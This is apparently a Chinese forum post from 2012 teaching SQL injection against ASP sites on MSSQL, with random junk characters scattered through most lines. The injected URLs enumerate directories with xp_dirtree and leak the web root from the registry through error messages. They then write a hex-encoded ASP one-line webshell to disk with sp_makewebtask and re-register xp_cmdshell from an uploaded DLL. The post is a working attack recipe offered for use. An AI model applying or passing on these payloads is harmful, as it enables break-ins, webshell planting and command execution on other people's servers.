好,我们exec master..xp_dirtree'd:/test': S2 [( q+ I" g; |5 T
假设我们在test里有两个文件夹test1和test2在test1里又有test3
% c4 v! N% S8 b" Z结果显示
- r; ^' w6 o- w1 O4 c* i4 m4 J. @! l2 ?0 L
subdirectory depth5 q% g6 f U) l. U6 p. J
test1 10 p# @) p( D) y1 Z5 x0 ?- b
test3 2# ]8 w1 @3 f& d
test2 1
, I7 w( l( y' S, S* X! K# M- r; j7 B. u- N: P" Q
哈哈发现没有那个depth就是目录的级数
, p% j7 x& W3 mok了,知道怎么办了吧
! B; j$ r q% a0 q+ h8 ^$ ~7 X6 b9 b; x! z: o
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
5 L0 R9 d4 C& g# p7 Fhttp://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' --
6 s' r3 ?! F- Zhttp://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-6 q3 g# B5 t' n$ z8 h. D( _
2 [* w' Q& B# ?' D只要加上id=1,就是第一级目录 。
3 ^- ?# A& ?6 O: G& ~( K) E
. Y) k9 b" E8 l& J0 e2 W
; G7 ]$ K! f" r通过注册表读网站路径:+ c3 T" P# T! Y1 R5 c4 t9 j
3 a( m* I; w% ]- q4 c1.;create table [dbo].[cyfd] ([gyfd][char](255));
9 [( J/ Z: E4 W! x* o. G* U/ v0 g6 K1 Z. Y7 U$ R
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--
m. j) }9 i& v5 cid=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--, w$ D: N( l I3 t
8 [3 G$ c5 P" P( o2 _# W
3.and 1=(select count(*) from 临时表 where 临时字段名>1)) s0 b% H9 B* Z* g
and 1=(select count(*) from cyfd where gyfd > 1) H' ~6 M% N3 J) G% J
这样IE报错,就把刚才插进去的Web路径的值报出来了
0 n8 [. k4 u% `6 \0 M
' t7 z: S0 V( \8 r' {& C4.drop table cyfd;-- 删除临时表% }. g# u9 |) m* O" s( l
+ C2 Q' M% {# w" Y4 X获得webshell方法:
* R/ X/ q% I& @! p1.create table cmd (a image)-- \**cmd是创建的临时表
" r5 g# t0 n( }
# K: C; ~- s/ |$ ?& N, B( }2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
* q& U# N$ O. `# S( J. m! e/ ]; d7 J4 [% ?% Q+ l5 y/ |
* _ R+ x) o; \5 J
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'
7 _) t1 G4 D& d9 [- p8 E* d( AEXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
5 q( G7 t" H0 ]( z/ K5 [
' x+ K" s/ x) v( f# l$ U- q" a4.drop table cmd;-- 删除cmd临时表+ R2 S/ t' @# B$ X) F) G; Y* n
. u5 W# k' m: K* x6 _
恢复xp_cmdshell方法之一:
: X2 S+ v8 D$ z# ~3 d3 ]我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:; `* q) f! V6 I
http://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'1 M# U" y+ |6 Y5 ]% F( z: x! t
恢复,支持绝对路径的恢复哦。:)& v8 C# d3 @4 j# X
|
发表于 2012-9-13 17:20:30
收藏
支持
反对